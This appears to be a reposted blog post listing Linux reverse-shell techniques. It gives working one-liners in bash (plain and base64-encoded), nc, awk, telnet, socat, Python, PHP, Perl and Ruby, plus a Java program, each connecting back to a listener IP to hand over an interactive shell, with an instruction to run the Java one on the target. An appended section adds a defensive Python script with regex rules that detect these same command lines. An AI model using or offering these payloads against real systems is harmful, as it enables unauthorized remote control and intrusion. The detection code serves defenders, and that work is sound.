Linux reverse shell techniques
程序员文章站
2022-03-09 22:42:51
1. bash reverse shell
bash -i >& /dev/tcp/192.168.1.121/1234 0>&1
base64 version: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIxLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
Online encoder: http://www.jackson-t.ca/runtime-exec-payloads.html
2. nc reverse shell
nc -e /bin/bash 192.168.1.121 1234
3. awk reverse shell
awk 'BEGIN{s="/inet/tcp/0/192.168.1.121/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
4. telnet reverse shell
This one needs two listeners on the attacking host, on ports 1234 and 4321. After the reverse shell command runs, type commands into the terminal on 1234 and read their output in the terminal on 4321.
telnet 192.168.1.121 1234 | /bin/bash | telnet 192.168.1.121 4321
5. socat reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.121:1234
6. Python reverse shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.121',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
7. PHP reverse shell
php -r '$sock=fsockopen("192.168.1.121",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
8. Perl reverse shell
perl -e 'use Socket;$i="192.168.1.121";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
9. Ruby reverse shell
ruby -rsocket -e'f=TCPSocket.open("192.168.1.121",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
10. Java reverse shell
public class Revs {
    public static void main(String[] args) throws Exception {
        // Same idea as the bash one-liner in section 1: bash opens fd 5 as a
        // TCP connection to the listener, then reads commands from it line by
        // line and sends their output back over the same descriptor.
        Runtime r = Runtime.getRuntime();
        String[] cmd = {"/bin/bash", "-c",
            "exec 5<>/dev/tcp/192.168.1.121/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
Compile the Java file, then run it on the target machine to get the reverse shell.
Reference: https://mp.weixin.qq.com/s/uXnPctlOBmciHM4Q-7oquw
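From the defender's side, every one-liner above leaves a recognisable process command line. The following Python, added here as an example and not part of the original post, scans recorded command lines (as an auditd execve record or EDR process-creation event would carry them) against one regex per technique, and also decodes embedded base64 so the encoded bash variant is matched by the same /dev/tcp rule as the plain one. The sample command lines are constructed for illustration and the rule names are hypothetical.

```python
import base64
import re

# Constructed sample process command lines, shaped like what an auditd execve
# record or EDR process-creation event would carry; not taken from real logs.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.168.1.121/1234 0>&1",
    "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIxLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}",
    "nc -e /bin/bash 192.168.1.121 1234",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.121:1234",
    "python -c \"import os,socket;s=socket.socket();s.connect(('192.168.1.121',1234));os.dup2(s.fileno(),0)\"",
    "php -r '$sock=fsockopen(\"192.168.1.121\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "telnet 192.168.1.121 1234 | /bin/bash | telnet 192.168.1.121 4321",
    "grep -r fsockopen /var/www/html",   # benign: mentions fsockopen, no php/exec
    "tar -czf backup.tgz /home/user",    # benign
]

# Rule names are hypothetical; each regex targets one technique from the post.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc_exec", re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh\b")),
    ("socat_exec_tcp", re.compile(r"\bsocat\b.*\bexec:.*\btcp:")),
    ("python_dup2", re.compile(r"\bpython[23]?\b.*socket.*os\.dup2\(")),
    ("php_fsockopen_exec", re.compile(r"\bphp\b.*fsockopen\(.*\bexec\(")),
    ("telnet_pipe_shell", re.compile(r"\btelnet\b.*\|\s*/bin/(?:ba)?sh\b")),
    ("base64_piped_bash", re.compile(r"base64.*-d.*\|.*\b(?:ba)?sh\b")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_layers(cmdline):
    """Yield the command line, then any embedded base64 token that decodes to text."""
    yield cmdline
    for tok in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except ValueError:  # bad padding, non-alphabet chars, or not UTF-8
            continue
        if text.isprintable():
            yield text


def scan(cmdline):
    """Return the sorted list of rule names that fire on any layer."""
    return sorted({name for layer in decoded_layers(cmdline)
                   for name, rx in RULES if rx.search(layer)})


def scan_all(cmdlines):
    """Map each suspicious command line to the rules it triggered."""
    return {c: hits for c in cmdlines if (hits := scan(c))}
```

Running scan_all(SAMPLE_CMDLINES) flags the seven reverse shell lines and none of the two benign ones; the base64 line triggers both base64_piped_bash and, after decoding, bash_dev_tcp.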